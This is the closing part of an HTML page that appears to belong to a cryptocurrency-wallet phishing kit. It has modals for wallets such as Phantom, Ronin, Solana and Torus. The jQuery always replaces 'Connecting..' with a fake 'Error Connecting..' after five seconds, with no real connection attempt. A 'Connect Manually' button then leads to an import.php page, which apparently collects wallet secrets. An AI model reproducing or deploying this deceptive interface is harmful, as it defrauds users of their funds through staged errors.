                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-eidoo-wallet.png" alt="wallet_img" /> 
                                                    Eidoo Wallet 
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem19">Connecting..</span>
                                                    
                            
                                                    <span id="Elem19" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet= Eidoo Wallet " class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                                 <!--Protocol Modal -->
                                 <div class="modal fade" id="protocol" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-protocol.png" alt="wallet_img" /> 
                                                   Protocol Wallet
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem20">Connecting..</span>
                                                    
                            
                                                    <span id="Elem20" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Protocol Wallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>



                                <!--Squarelink Modal -->
                                <div class="modal fade" id="squarelink" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-squarelink.png" alt="wallet_img" /> 
                                                   Squarelink
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem21">Connecting..</span>
                                                    
                            
                                                    <span id="Elem21" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Squarelink" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>
                                
        

                                 <!--Torus Modal -->
                                 <div class="modal fade" id="torus" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-torus.jpg" alt="wallet_img" /> 
                                                   Torus
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem22">Connecting..</span>
                                                    
                            
                                                    <span id="Elem22" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Torus" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>
                                


                                 <!--Ronin Modal -->
                                 <div class="modal fade" id="ronin" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/ronin.png" alt="wallet_img" /> 
                                                   Ronin
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem23">Connecting..</span>
                                                    
                            
                                                    <span id="Elem23" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Ronin" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>



                                 <!--Solana Modal -->
                                 <div class="modal fade" id="solana" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/solana.png" alt="wallet_img" /> 
                                                   Solana
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem24">Connecting..</span>
                                                    
                            
                                                    <span id="Elem24" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Solana" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                                 <!--Phantom Modal -->
                                 <div class="modal fade" id="phantom" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/phantom.webp" alt="wallet_img" /> 
                                                    Phantom
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem25">Connecting..</span>
                                                    
                            
                                                    <span id="Elem25" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet= Phantom" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>



                                 <!--Authereum Modal -->
                                 <div class="modal fade" id="auth" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-authereum.svg" alt="wallet_img" /> 
                                                    Authereum
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem26">Connecting..</span>
                                                    
                            
                                                    <span id="Elem26" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Authereum" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                                  <!--OTHERS Modal -->
                                  <div class="modal fade" id="others" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/undraw_Confirmation_re_b6q5.png" alt="wallet_img" /> 
                                                    Others
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem27">Connecting..</span>
                                                    
                            
                                                    <span id="Elem27" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Others" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                

                
                                
        
        


        
        
        
        




    <script>

        $("#myElem").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem2").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem2").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem2").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem2").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//


$("#myElem3").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem3").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem3").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem3").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem4").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem4").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem4").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem4").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem5").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem5").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem5").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem5").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem6").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem6").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem6").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem6").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem7").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem7").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem7").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem7").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem8").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem8").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem8").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem8").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//


$("#myElem9").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem9").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem9").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem9").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem10").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem10").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem10").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem10").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem11").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem11").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem11").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem11").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem12").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem12").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem12").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem12").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem13").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem31").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem13").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem13").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});



//

$("#myElem14").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem14").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem14").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem14").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});




//

$("#myElem15").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem15").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem15").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem15").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem16").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem16").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem16").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem16").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});


//

$("#myElem17").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem17").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem17").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem17").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem18").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem18").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem18").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem18").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem19").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem19").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem19").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem19").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});


//

$("#myElem20").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem20").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Ele20").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem20").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem21").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem21").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem21").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem21").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem22").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem23").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem23").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem23").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem24").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem24").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem24").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem24").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem25").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem25").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem25").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem25").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});
//

$("#myElem26").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem26").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem26").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem26").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});

//

$("#myElem27").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem27").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem27").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem27").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});


//

$("#myElem28").show().delay(0).queue(function(n) {
  $(this).show(); n();
});

$("#myElem28").show().delay(5000).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem28").hide().delay(0).queue(function(n) {
  $(this).hide(); n();
});

$("#Elem28").show().delay(5000).queue(function(n) {
  $(this).show(); n();
});


    </script>
    
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js" integrity="sha384-IQsoLXl5PILFhosVNubq5LC7Qb9DXgDA9i+tQ8Zj3iwWAwPtgFTxbJ8NT4GN1R8p" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-cVKIPhGWiC2Al4u+LWgxfKTRIcfu0JTxR+EQDz/bgldoEyl4H0zUF0QKbrJ0EcQF" crossorigin="anonymous"></script>
</body>


</html> 